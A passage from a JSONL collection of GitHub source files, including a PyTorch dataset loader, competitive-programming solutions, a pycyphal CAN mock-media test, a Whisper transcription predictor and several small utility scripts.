is expected to contain subfolders for each class, with the images inside.\n\n Args:\n data_path (Path): Path to the root folder of the dataset.\n label_map (dict): dictionarry mapping an int to a class\n limit (int, optional): If given then the number of elements for each class in the dataset\n will be capped to this number\n shuffle (bool): If true then the data is shuffled once before being returned\n verbose (bool): Verbose mode, print loading progress.\n\n Return:\n 2 numpy arrays, one containing the images' paths and the other containing the labels.\n \"\"\"\n labels: npt.NDArray[np.int64] = np.empty(0, dtype=np.int64)\n data: npt.NDArray[np.object_] = np.empty(0, dtype=Path)\n exts = (\".png\", \".jpg\", \".bmp\")\n for key in range(len(label_map)):\n class_dir_path = data_path / label_map[key]\n img_paths: list[Path] = [path for path in class_dir_path.rglob('*') if path.suffix in exts]\n for i, img_path in enumerate(img_paths, start=1):\n if verbose:\n clean_print(f\"Processing image {img_path.name} ({i}/{len(img_paths)}) for class {label_map[key]}\",\n end=\"\\r\" if (i != len(img_paths) and i != limit) else \"\\n\")\n data = np.append(data, img_path) # type: ignore\n labels = np.append(labels, key)\n if limit and i >= limit:\n break\n\n data, labels = np.asarray(data), np.asarray(labels)\n if shuffle:\n index_list = np.arange(len(labels), dtype=np.int64)\n np.random.shuffle(index_list)\n data, labels, = data[index_list], labels[index_list]\n\n return data, labels\n\n\ndef default_load_data(data: Path | Iterable[Path]) -> npt.NDArray[np.uint8]:\n \"\"\"Function that loads image(s) from path(s).\n\n Args:\n data (path): either an image path or a batch of image paths, and return the loaded image(s)\n\n Returns:\n Image or batch of image\n \"\"\"\n if isinstance(data, Path):\n img = cv2.imread(str(data))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img # type: ignore\n else:\n imgs = []\n for image_path in data:\n imgs.append(default_load_data(image_path))\n return np.asarray(imgs)\n\n\nif __name__ == \"__main__\":\n def _test_fn():\n from argparse import ArgumentParser\n from src.torch_utils.utils.imgs_misc import show_img\n parser = ArgumentParser(description=(\"Script to test the loading function. \"\n \"Run with 'python -m src.dataset.default_loader '\"))\n parser.add_argument(\"data_path\", type=Path, help=\"Path to a classification dataset (Train or Validation).\")\n args = parser.parse_args()\n\n data_path: Path = args.data_path\n\n label_map = {}\n with open(data_path.parent / \"classes.names\") as text_file:\n for key, line in enumerate(text_file):\n label_map[key] = line.strip()\n\n data, labels = default_loader(data_path, label_map, limit=20)\n img1, _img2 = default_load_data(data[:2])\n print(labels[0])\n show_img(img1)\n\n _test_fn()\n","repo_name":"hoel-bagard/image_classification_pytorch","sub_path":"src/dataset/default_loader.py","file_name":"default_loader.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"45452151922","text":"# from sys import stdin\n# import heapq as h\n\n# input = stdin.readline\n\n# n = int(input().rstrip())\n# hardq = []\n# easyq = []\n# idx = [0] * 100001\n# for _ in range(n):\n# num, difficult = map(int, input().rstrip().split())\n# h.heappush(hardq, (-difficult, -num))\n# h.heappush(easyq, (difficult, num))\n# idx[num] = difficult\n\n# m = int(input().rstrip())\n# ans = ''\n# for _ in range(m):\n# cmd = input().rstrip().split()\n# num = int(cmd[1])\n# if cmd[0] == 'recommend':\n# # ans += str(hardq) + '\\n'\n# if num == 1:\n# ans += str(-hardq[0][1])+'\\n'\n# elif num == -1:\n# ans += str(easyq[0][1])+'\\n'\n# elif cmd[0] == 'add':\n# difficult = int(cmd[2])\n# h.heappush(hardq, (-difficult, -num))\n# h.heappush(easyq, (difficult, num))\n# idx[num] = difficult\n# elif cmd[0] == 'solved':\n# easyq.remove((idx[num], num))\n# hardq.remove((-idx[num], -num))\n# idx[num] = 0\n# print(ans)\n\nimport sys\ninput = sys.stdin.readline\nfrom heapq import heappop,heappush\nfrom collections import defaultdict\n\n\nN = int(input())\nmin_heap = []\nmax_heap = []\nin_list = defaultdict(bool)\nfor _ in range(N):\n P, L = map(int, input().split())\n heappush(min_heap,[L,P])\n heappush(max_heap,[-L,-P])\n in_list[P] = True\n\nM = int(input())\nfor _ in range(M):\n command = input().split()\n if command[0]=='recommend':\n if command[1]=='1':\n while not in_list[-max_heap[0][1]]:\n heappop(max_heap)\n print(-max_heap[0][1])\n else:\n while not in_list[min_heap[0][1]]:\n heappop(min_heap)\n print(min_heap[0][1])\n elif command[0]=='solved':\n in_list[int(command[1])] = False\n else:\n P = int(command[1])\n L = int(command[2])\n # 같은 번호의 다른 난이도 문제가 삽입되어 이미 죽은 문제인데 True로 나와 출력되는 것을 방지.\n while not in_list[-max_heap[0][1]]:\n heappop(max_heap)\n while not in_list[min_heap[0][1]]:\n heappop(min_heap)\n in_list[P] = True\n heappush(max_heap,[-L,-P])\n heappush(min_heap,[L,P])","repo_name":"Acver14/forCodingTest","sub_path":"before 2022.04.27/BaekJoon/DataStructure/Python/21939.py","file_name":"21939.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73972643441","text":"import math\nimport re\nimport sys\nfrom collections import defaultdict\n\ndef runit(prog):\n acc = 0\n pc = 0\n second = defaultdict(int)\n\n while pc < len(prog):\n second[pc] = second[pc] +1\n if(second[pc] == 2):\n# print(acc)\n return False\n\n (instr, para) = prog[pc]\n if(instr==\"nop\"):\n pc=pc+1\n if(instr==\"jmp\"):\n pc=pc+para\n if(instr==\"acc\"):\n pc=pc+1\n acc=acc+para\n\n print(acc)\n return True\n\ndef main():\n\n acc = 0\n prog = []\n pc = 0\n\n\n with open('day8.txt') as f:\n lines = f.readlines()\n for l in lines:\n (instr, para) = l.strip().split(\" \")\n prog.append((instr, int(para)))\n\n for i in range(len(prog)):\n perm = prog[:]\n (instr, para) = perm[i]\n if(instr==\"nop\"):\n instr=\"jmp\"\n if(instr==\"jmp\"):\n instr = \"nop\"\n if(instr==\"acc\"):\n pass\n perm[i] = (instr,para)\n r = runit(perm)\n if(r):\n print(i)\n\n\n\n\n\n\n\nif __name__ ==\"__main__\":\n main()\n\n","repo_name":"ghosthugger/aoc2020","sub_path":"day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21411880015","text":"from __future__ import annotations\nimport typing\nimport asyncio\nimport pytest\nimport pycyphal.transport\nfrom pycyphal.transport import Timestamp\nfrom pycyphal.transport.can.media import Media, Envelope, FilterConfiguration, DataFrame, FrameFormat\n\npytestmark = pytest.mark.asyncio\n\n\nclass MockMedia(Media):\n def __init__(self, peers: typing.Set[MockMedia], mtu: int, number_of_acceptance_filters: int):\n self._peers = peers\n peers.add(self)\n\n self._mtu = int(mtu)\n\n self._rx_handler: Media.ReceivedFramesHandler = lambda _: None # pragma: no cover\n self._acceptance_filters = [\n self._make_dead_filter() # By default drop (almost) all frames\n for _ in range(int(number_of_acceptance_filters))\n ]\n self._automatic_retransmission_enabled = False # This is the default per the media interface spec\n self._closed = False\n\n self._raise_on_send_once: typing.Optional[Exception] = None\n\n super().__init__()\n\n @property\n def loop(self) -> asyncio.AbstractEventLoop:\n return asyncio.get_event_loop()\n\n @property\n def interface_name(self) -> str:\n return f\"mock@{id(self._peers):08x}\"\n\n @property\n def mtu(self) -> int:\n return self._mtu\n\n @property\n def number_of_acceptance_filters(self) -> int:\n return len(self._acceptance_filters)\n\n def start(self, handler: Media.ReceivedFramesHandler, no_automatic_retransmission: bool) -> None:\n if self._closed:\n raise pycyphal.transport.ResourceClosedError\n\n assert callable(handler)\n self._rx_handler = handler\n assert isinstance(no_automatic_retransmission, bool)\n self._automatic_retransmission_enabled = not no_automatic_retransmission\n\n def configure_acceptance_filters(self, configuration: typing.Sequence[FilterConfiguration]) -> None:\n if self._closed:\n raise pycyphal.transport.ResourceClosedError\n\n configuration = list(configuration) # Do not mutate the argument\n while len(configuration) < len(self._acceptance_filters):\n configuration.append(self._make_dead_filter())\n\n assert len(configuration) == len(self._acceptance_filters)\n self._acceptance_filters = configuration\n\n @property\n def automatic_retransmission_enabled(self) -> bool:\n return self._automatic_retransmission_enabled\n\n @property\n def acceptance_filters(self) -> typing.List[FilterConfiguration]:\n return list(self._acceptance_filters)\n\n async def send(self, frames: typing.Iterable[Envelope], monotonic_deadline: float) -> int:\n del monotonic_deadline # Unused\n if self._closed:\n raise pycyphal.transport.ResourceClosedError\n\n if self._raise_on_send_once:\n self._raise_on_send_once, ex = None, self._raise_on_send_once\n assert isinstance(ex, Exception)\n raise ex\n\n frames = list(frames)\n assert len(frames) > 0, \"Interface constraint violation: empty transmission set\"\n assert min(map(lambda x: len(x.frame.data), frames)) >= 1, \"CAN frames with empty payload are not valid\"\n # The media interface spec says that it is guaranteed that the CAN ID is the same across the set; enforce this.\n assert len(set(map(lambda x: x.frame.identifier, frames))) == 1, \"Interface constraint violation: nonuniform ID\"\n\n timestamp = Timestamp.now()\n\n # Broadcast across the virtual bus we're emulating here.\n for p in self._peers:\n if p is not self:\n # Unconditionally clear the loopback flag because for the other side these are\n # regular received frames, not loopback frames.\n p._receive( # pylint: disable=protected-access\n (timestamp, Envelope(f.frame, loopback=False)) for f in frames\n )\n\n # Simple loopback emulation with acceptance filtering.\n self._receive((timestamp, f) for f in frames if f.loopback)\n return len(frames)\n\n def close(self) -> None:\n if not self._closed:\n self._closed = True\n self._peers.remove(self)\n\n def raise_on_send_once(self, ex: Exception) -> None:\n self._raise_on_send_once = ex\n\n def inject_received(self, frames: typing.Iterable[typing.Union[Envelope, DataFrame]]) -> None:\n timestamp = Timestamp.now()\n self._receive(\n (\n timestamp,\n (f if isinstance(f, Envelope) else Envelope(frame=f, loopback=False)),\n )\n for f in frames\n )\n\n def _receive(self, frames: typing.Iterable[typing.Tuple[Timestamp, Envelope]]) -> None:\n frames = list(filter(lambda item: self._test_acceptance(item[1].frame), frames))\n if frames: # Where are the assignment expressions when you need them?\n self._rx_handler(frames)\n\n def _test_acceptance(self, frame: DataFrame) -> bool:\n return any(\n map(\n lambda f: frame.identifier & f.mask == f.identifier & f.mask\n and (f.format is None or frame.format == f.format),\n self._acceptance_filters,\n )\n )\n\n @staticmethod\n def list_available_interface_names() -> typing.Iterable[str]:\n return [] # pragma: no cover\n\n @staticmethod\n def _make_dead_filter() -> FilterConfiguration:\n fmt = FrameFormat.BASE\n return FilterConfiguration(0, 2 ** int(fmt) - 1, fmt)\n\n\nasync def _unittest_can_mock_media() -> None:\n peers: typing.Set[MockMedia] = set()\n\n me = MockMedia(peers, 64, 3)\n assert len(peers) == 1 and me in peers\n assert me.mtu == 64\n assert me.number_of_acceptance_filters == 3\n assert not me.automatic_retransmission_enabled\n assert str(me) == f\"MockMedia('mock@{id(peers):08x}', mtu=64)\"\n\n me_collector = FrameCollector()\n me.start(me_collector.give, False)\n assert me.automatic_retransmission_enabled\n\n # Will drop the loopback because of the acceptance filters\n await me.send(\n [\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"abc\")), loopback=False),\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\")), loopback=True),\n ],\n asyncio.get_event_loop().time() + 1.0,\n )\n assert me_collector.empty\n\n me.configure_acceptance_filters([FilterConfiguration.new_promiscuous()])\n # Now the loopback will be accepted because we have reconfigured the filters\n await me.send(\n [\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"abc\")), loopback=False),\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\")), loopback=True),\n ],\n asyncio.get_event_loop().time() + 1.0,\n )\n assert me_collector.pop()[1].frame == DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\"))\n assert me_collector.empty\n\n pe = MockMedia(peers, 8, 1)\n assert peers == {me, pe}\n\n pe_collector = FrameCollector()\n pe.start(pe_collector.give, False)\n\n me.raise_on_send_once(RuntimeError(\"Hello world!\"))\n with pytest.raises(RuntimeError, match=\"Hello world!\"):\n await me.send([], asyncio.get_event_loop().time() + 1.0)\n\n await me.send(\n [\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"abc\")), loopback=False),\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\")), loopback=True),\n ],\n asyncio.get_event_loop().time() + 1.0,\n )\n assert pe_collector.empty\n\n pe.configure_acceptance_filters([FilterConfiguration(123, 127, None)])\n await me.send(\n [\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"abc\")), loopback=False),\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\")), loopback=True),\n ],\n asyncio.get_event_loop().time() + 1.0,\n )\n await me.send(\n [\n Envelope(DataFrame(FrameFormat.EXTENDED, 456, bytearray(b\"ghi\")), loopback=False), # Dropped by the filters\n ],\n asyncio.get_event_loop().time() + 1.0,\n )\n assert pe_collector.pop()[1].frame == DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"abc\"))\n assert pe_collector.pop()[1].frame == DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\"))\n assert pe_collector.empty\n\n me.close()\n me.close() # Idempotency.\n assert peers == {pe}\n with pytest.raises(pycyphal.transport.ResourceClosedError):\n await me.send([], asyncio.get_event_loop().time() + 1.0)\n with pytest.raises(pycyphal.transport.ResourceClosedError):\n me.configure_acceptance_filters([])\n await asyncio.sleep(1) # Let all pending tasks finalize properly to avoid stack traces in the output.\n\n\nclass FrameCollector:\n def __init__(self) -> None:\n self._collected: typing.List[typing.Tuple[Timestamp, Envelope]] = []\n\n def give(self, frames: typing.Iterable[typing.Tuple[Timestamp, Envelope]]) -> None:\n frames = list(frames)\n assert all(map(lambda x: isinstance(x[0], Timestamp) and isinstance(x[1], Envelope), frames))\n self._collected += frames\n\n def pop(self) -> typing.Tuple[Timestamp, Envelope]:\n head, *self._collected = self._collected\n return head\n\n @property\n def empty(self) -> bool:\n return len(self._collected) == 0\n\n def __repr__(self) -> str: # pragma: no cover\n return f\"{type(self).__name__}({str(self._collected)})\"\n","repo_name":"OpenCyphal/pycyphal","sub_path":"tests/transport/can/media/mock/_media.py","file_name":"_media.py","file_ext":"py","file_size_in_byte":9491,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"75"} +{"seq_id":"3583636164","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport tinymce.models\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (\"eventos\", \"0013_modelodeclaracao\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"modelodeclaracao\",\n name=\"texto\",\n field=tinymce.models.HTMLField(\n help_text=\"Use as seguintes marca\\xe7\\xf5es:
  • {{ casa.nome }} para o nome da Casa Legislativa / \\xf3rg\\xe3o
  • {{ casa.municipio.uf.sigla }} para a sigla da UF da Casa legislativa
  • {{ nome }} para o nome do visitante
  • {{ data }} para a data de emiss\\xe3o da declara\\xe7\\xe3o
  • {{ evento.data_inicio }} para a data/hora do in\\xedcio da visita
  • {{ evento.data_termino }} para a data/hora do t\\xe9rmino da visita
  • {{ evento.nome }} para o nome do evento
  • {{ evento.descricao }} para a descri\\xe7\\xe3o do evento
\",\n verbose_name=\"Texto da declara\\xe7\\xe3o\",\n ),\n preserve_default=True,\n ),\n ]\n","repo_name":"interlegis/sigi","sub_path":"sigi/apps/eventos/migrations/0014_auto_20211124_0736.py","file_name":"0014_auto_20211124_0736.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"pt","doc_type":"code","stars":10,"dataset":"github-code","pt":"75"} +{"seq_id":"40026185048","text":"ans = ''\n\ndef all_pop(stack, bracket, mul):\n global ans\n while len(stack) > 0:\n tmp = stack.pop()\n if mul and (tmp == '+' or tmp == '-'):\n stack.append(tmp)\n return\n if tmp == '(' and bracket:\n return\n elif tmp == '(':\n stack.append('(')\n return\n else:\n ans += tmp\n\n\nexp = input()\n\nindex = 0\n\nstack = []\n\nans = ''\n\nwhile index < len(exp):\n \n oper = exp[index]\n\n if oper == '+' or oper == '-':\n all_pop(stack, False, False)\n stack.append(oper)\n\n elif oper == '(':\n stack.append(oper)\n\n elif oper == '*' or oper == '/':\n if len(stack) > 0 and (stack[-1] == '*' or stack[-1] == '/'):\n all_pop(stack, False, True)\n stack.append(oper)\n\n elif oper == ')':\n all_pop(stack, True, False)\n\n else:\n ans += oper\n\n index += 1\n\nall_pop(stack, False, False)\n\nprint(ans)\n\n","repo_name":"jintak0401/Problem_Solving","sub_path":"1918.py","file_name":"1918.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36147901914","text":"import textract\nfrom fpdf import FPDF\n\n# Extract text from word document\ntext = textract.process(\"original.docx\").decode(\"utf-8\")\n# text = textract.process(\"template.pdf\").decode(\"utf-8\")\npdf = FPDF()\npdf.add_font('Arial Unicode', '', 'Arial Unicode MS Font.ttf', uni=True)\npdf.set_font(\"Arial Unicode\", size=12)\n\n# Replace the old text with the new text\ntext = text.replace(\"offer_to\", \"new text\")\n\n# Create a new pdf document\npdf.add_page()\npdf.multi_cell(0, 10, txt=text)\npdf.output(\"modified.pdf\")\n","repo_name":"Nick-X-Mar/Sylor","sub_path":"endpoints/pdf_management/pdfminer.py","file_name":"pdfminer.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73344346802","text":"import kivy\nfrom kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nimport os.path\n\nlista_asistencia=[]\nclass Asistencias(BoxLayout):\n\tdef guardar(self,nombre):\n\t\tlista_asistencia.append(nombre)\n\t\tprint (lista_asistencia)\n\tdef exportar(self):\t\n\t\tBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\t\tdb_path = os.path.join(BASE_DIR, \"Asistencias.txt\")\t\n\t\tarchi=open(db_path,'a')\n\t\tfor x in lista_asistencia:\n\t\t\tarchi.write(x+\" \")\n\t\t\tarchi.write(\"\\n\")\n\t\tarchi.close()\nclass RegistrosAPP(App):\t\n\tdef build(self):\n\t\tregistro = Asistencias()\n\t\treturn registro\n\nif __name__ == \"__main__\":\n RegistrosAPP().run()\n","repo_name":"eliecer11/Uip-prog3","sub_path":"Tareas/tarea7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16245008866","text":"\"\"\"\ndownload the models to ./weights\nwget https://openaipublic.azureedge.net/main/whisper/models/65147644a518d12f04e32d6f3b26facc3f8dd46e5390956a9424a650c0ce22b9/tiny.pt -P ./weights\nwget https://openaipublic.azureedge.net/main/whisper/models/ed3a0b6b1c0edf879ad9b11b1af5a0e6ab5db9205f891f668f8b0e6c6326e34e/base.pt -P ./weights\nwget https://openaipublic.azureedge.net/main/whisper/models/9ecf779972d90ba49c06d968637d720dd632c55bbf19d441fb42bf17a411e794/small.pt -P ./weights\nwget https://openaipublic.azureedge.net/main/whisper/models/345ae4da62f9b3d59415adc60127b97c714f32e89e936602e85993674d08dcb1/medium.pt -P ./weights\nwget https://openaipublic.azureedge.net/main/whisper/models/e4b87e7e0bf463eb8e6956e646f1e277e901512310def2c24bf0e11bd3c28e9a/large.pt -P ./weights\n\"\"\"\n\nimport io\nimport os\nfrom typing import Optional, Any\nimport torch\nimport numpy as np\nfrom cog import BasePredictor, Input, Path, BaseModel\n\nimport whisper\nfrom whisper.model import Whisper, ModelDimensions\nfrom whisper.tokenizer import LANGUAGES, TO_LANGUAGE_CODE\nfrom whisper.utils import format_timestamp\n\n\nclass ModelOutput(BaseModel):\n detected_language: str\n transcription: str\n segments: Any\n translation: Optional[str]\n txt_file: Optional[Path]\n srt_file: Optional[Path]\n\n\nclass Predictor(BasePredictor):\n def setup(self):\n \"\"\"Load the model into memory to make running multiple predictions efficient\"\"\"\n\n self.models = {}\n for model in [\"tiny\", \"base\", \"small\", \"medium\", \"large\"]:\n model_bytes = open(f\"weights/{model}.pt\", \"rb\").read()\n with io.BytesIO(model_bytes) as fp:\n checkpoint = torch.load(fp, map_location=\"cpu\")\n\n dims = ModelDimensions(**checkpoint[\"dims\"])\n state_dict = checkpoint[\"model_state_dict\"]\n self.models[model] = Whisper(dims)\n self.models[model].load_state_dict(state_dict)\n\n def predict(\n self,\n audio: Path = Input(description=\"Audio file\"),\n model: str = Input(\n default=\"base\",\n choices=[\"tiny\", \"base\", \"small\", \"medium\", \"large\"],\n description=\"Choose a Whisper model.\",\n ),\n transcription: str = Input(\n choices=[\"plain text\", \"srt\", \"vtt\"],\n default=\"plain text\",\n description=\"Choose the format for the transcription\",\n ),\n translate: bool = Input(\n default=False,\n description=\"Translate the text to English when set to True\",\n ),\n language: str = Input(\n choices=sorted(LANGUAGES.keys()) + sorted([k.title() for k in TO_LANGUAGE_CODE.keys()]),\n default=None,\n description=\"language spoken in the audio, specify None to perform language detection\",\n ),\n temperature: float = Input(\n default=0,\n description=\"temperature to use for sampling\",\n ),\n patience: float = Input(\n default=None,\n description=\"optional patience value to use in beam decoding, as in https://arxiv.org/abs/2204.05424, the default (1.0) is equivalent to conventional beam search\",\n ),\n suppress_tokens: str = Input(\n default=\"-1\",\n description=\"comma-separated list of token ids to suppress during sampling; '-1' will suppress most special characters except common punctuations\",\n ),\n initial_prompt: str = Input(\n default=None,\n description=\"optional text to provide as a prompt for the first window.\",\n ),\n condition_on_previous_text: bool = Input(\n default=True,\n description=\"if True, provide the previous output of the model as a prompt for the next window; disabling may make the text inconsistent across windows, but the model becomes less prone to getting stuck in a failure loop\",\n ),\n temperature_increment_on_fallback: float = Input(\n default=0.2,\n description=\"temperature to increase when falling back when the decoding fails to meet either of the thresholds below\",\n ),\n compression_ratio_threshold: float = Input(\n default=2.4,\n description=\"if the gzip compression ratio is higher than this value, treat the decoding as failed\",\n ),\n logprob_threshold: float = Input(\n default=-1.0,\n description=\"if the average log probability is lower than this value, treat the decoding as failed\",\n ),\n no_speech_threshold: float = Input(\n default=0.6,\n description=\"if the probability of the <|nospeech|> token is higher than this value AND the decoding has failed due to `logprob_threshold`, consider the segment as silence\",\n ),\n ) -> ModelOutput:\n\n \"\"\"Run a single prediction on the model\"\"\"\n print(f\"Transcribe with {model} model\")\n model = self.models[model].to(\"cuda\")\n\n if temperature_increment_on_fallback is not None:\n temperature = tuple(np.arange(temperature, 1.0 + 1e-6, temperature_increment_on_fallback))\n else:\n temperature = [temperature]\n\n args = {\n \"language\": language,\n \"patience\": patience,\n \"suppress_tokens\": suppress_tokens,\n \"initial_prompt\": initial_prompt,\n \"condition_on_previous_text\": condition_on_previous_text,\n \"compression_ratio_threshold\": compression_ratio_threshold,\n \"logprob_threshold\": logprob_threshold,\n \"no_speech_threshold\": no_speech_threshold\n }\n\n result = model.transcribe(str(audio), temperature=temperature, **args)\n\n if transcription == \"plain text\":\n transcription = result[\"text\"]\n elif transcription == \"srt\":\n transcription = write_srt(result[\"segments\"])\n else:\n transcription = write_vtt(result[\"segments\"])\n\n if translate:\n translation = model.transcribe(str(audio), task=\"translate\", temperature=temperature, **args)\n\n return ModelOutput(\n segments=result[\"segments\"],\n detected_language=LANGUAGES[result[\"language\"]],\n transcription=transcription,\n translation=translation[\"text\"] if translate else None,\n )\n\n\ndef write_vtt(transcript):\n result = \"\"\n for segment in transcript:\n result += f\"{format_timestamp(segment['start'])} --> {format_timestamp(segment['end'])}\\n\"\n result += f\"{segment['text'].strip().replace('-->', '->')}\\n\"\n return result\n\n\ndef write_srt(transcript):\n result = \"\"\n for i, segment in enumerate(transcript, start=1):\n result += f\"{i}\\n\"\n result += f\"{format_timestamp(segment['start'], always_include_hours=True, decimal_marker=',')} --> \"\n result += f\"{format_timestamp(segment['end'], always_include_hours=True, decimal_marker=',')}\\n\"\n result += f\"{segment['text'].strip().replace('-->', '->')}\\n\"\n return result\n","repo_name":"playgroundjohn/cog-whisper","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"25732267565","text":"import math\nimport matplotlib.pylab as grafica\n\n\nclass dB():\n\n def __init__(self, dB, bitDepth , frecMuestreo, frecOnda, duracion):\n # frecOnda es la frecuencia deseada\n # 1 / 44100 = 2.26 x 10 ^ -5 es el periodo de muestreo\n # 2seg * 44100 = 88200 muestras\n self.dBFs = dB\n self.bitDepth = bitDepth\n self.muestras = 1 / ( float(frecMuestreo) )\n self.frecOnda = frecOnda\n self.tiempo = int( duracion * frecMuestreo )\n\n def amplitud(self):\n valorPico = ( (2 ** self.bitDepth)/2 ) * ( 10 ** (self.dBFs/10) ) ** (0.5)\n return valorPico\n\n def procesoSenal(self, amplitud):\n arreglo = []\n for n in range(self.tiempo):\n x = amplitud * math.sin(2 * math.pi * self.frecOnda * (n * self.muestras)) # muestra a muestra\n arreglo.append(x)\n return arreglo\n\n def graficar(self, Arreglo):\n grafica.plot(Arreglo)\n grafica.show(Arreglo)","repo_name":"julionieto48/audio_jend","sub_path":"general audio/audio/8_sintesis/sintesis/pcm/PCM.py","file_name":"PCM.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13381649041","text":"# -*- coding: utf-8 -*-\n\nimport h5py\nimport numpy as np\nimport pandas as pd\nfrom keras.models import load_model\n\nobject = pd.read_pickle(r'result_embeddings.p')\n\n# Don't print the whole file, too big.\nfor index, elems in enumerate(object):\n print(\"LLVM IR Vector : \")\n print(elems)\n if index > 10:\n break\n\n# hdfOutput = pd.read_hdf(r'classifier_inst2vec.h5')\n# print(hdfOutput)\n\nfilename = \"CLASSIFYAPP-94.83.h5\"\n\nwith h5py.File(filename, \"r\") as f:\n # List all groups\n print(\"Keys: %s\" % f.keys())\n a_group_key = list(f.keys())[0]\n\n # Get the data\n data = list(f[a_group_key])\n print(data)\n\n# Read here.\n# https: // stackoverflow.com/questions/28170623/how-to-read-hdf5-files-in-python\n# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_hdf.html\n","repo_name":"lahiri-phdworks/PAVT-debloating-project","sub_path":"inst2vec-embeddings/inst2vec-logs/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"43130297096","text":"import requests\nfrom utils.http import GetRequestHeader\nimport json\n\n\ndef SendInvetoryCheckRequest(inputProductListStr):\n url = 'https://www.analog.com/client/Product/PostSampleBuyData'\n headers = GetRequestHeader()\n # print(headers)\n payload = {\n 'ProductIDList': inputProductListStr\n }\n r = requests.post(url=url, headers=headers, data=payload)\n productList = json.loads(r.text)['ModelList']\n print(productList)\n return productList\n\n\ndef CheckInventory(productList):\n placeOrderDic = {}\n for product in productList:\n placeOrderDic[product['ModelName']] = product['AnalogDevicesColumnInfo']['IsAddtoCart']\n print(placeOrderDic)\n return placeOrderDic\n\n\ndef main():\n inputProductListStr = 'LTC7000ARMSE#PBF,LTC7000ARMSE#TRPBF,LTC7000ARMSE#WPBF,LTC7000ARMSE#WTRPBF'\n productList = SendInvetoryCheckRequest(inputProductListStr)\n placeOrderDic = CheckInventory(productList)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"18820013443/chip-scrawler","sub_path":"spiders/check_inventory_spider.py","file_name":"check_inventory_spider.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36244782188","text":"import argparse\nfrom torchvision import transforms\nfrom dataset import AircraftDataset, Chest, coco, general_dataset, ISIC, omniglot, OxfordFlowers102Dataset, miniImageNet, CategoriesSampler\nfrom architectures import get_backbone, get_classifier\nimport tqdm\nimport torch\nimport torch.nn.functional as F\nfrom utils import count_acc, Averager\nimport numpy as np\nimport os\nfrom torch.utils.data import DataLoader\nimport collections\nimport math\n\nbackbones = ['resnet12', 'resnet50', 'WRN_28_10', 'conv-4', 'SEnet']\n\nclassifiers = ['proto_head', 'LR', \"metaopt\"]# LR for MoCo, S2M2; proto_head for PN, CE, Meta Baseline; metaopt for MetaOPT \n\ndatasets = ['miniImageNet', 'CUB', 'Textures', 'Traffic_Signs',\n 'Aircraft', 'Omniglot', 'VGG_Flower', 'MSCOCO', 'QuickDraw', 'Fungi', \n 'Plant_Disease', 'ISIC', 'EuroSAT', 'ChestX',\n 'Real', 'Sketch', 'Infograph', 'Painting', 'Clipart']\n\n\ndef parse_option():\n parser = argparse.ArgumentParser('argument for testing')\n\n # load pretrained model\n parser.add_argument('--backbone_name', type=str, default='resnet12', choices=backbones)\n parser.add_argument('--backbone_path', type=str, default=None, help='path to the pretrained backbone')\n parser.add_argument('--classifier_name', type=str, default='proto_head', choices=classifiers)\n\n # dataset\n parser.add_argument('--dataset_name', type=str, default='miniImageNet', choices=datasets)\n parser.add_argument('--dataset_root', type=str, default='', \n help='root directory of the dataset')\n parser.add_argument('--statistics_root', type=str, default='./data_statistics', \n help='(for oracle only) root to saved dataset statistics')\n \n\n\n # settings\n parser.add_argument('--num_task', type=int, default=2000,\n help='Number of tasks per run')\n parser.add_argument('--way', type=int, default=5,\n help='Number of classes per task')\n parser.add_argument('--shot', type=int, default=5,\n help='Number of support images per class')\n parser.add_argument('--num_query', type=int, default=15,\n help='Number of query images per class')\n parser.add_argument('--num_workers', type=int, default=4,\n help='Number of workers for dataloader')\n parser.add_argument('--batch_size', type=int, default=4,\n help='number of tasks per batch')\n parser.add_argument('--use_oracle', type=str, default=\"False\",\n help='whether use oracle 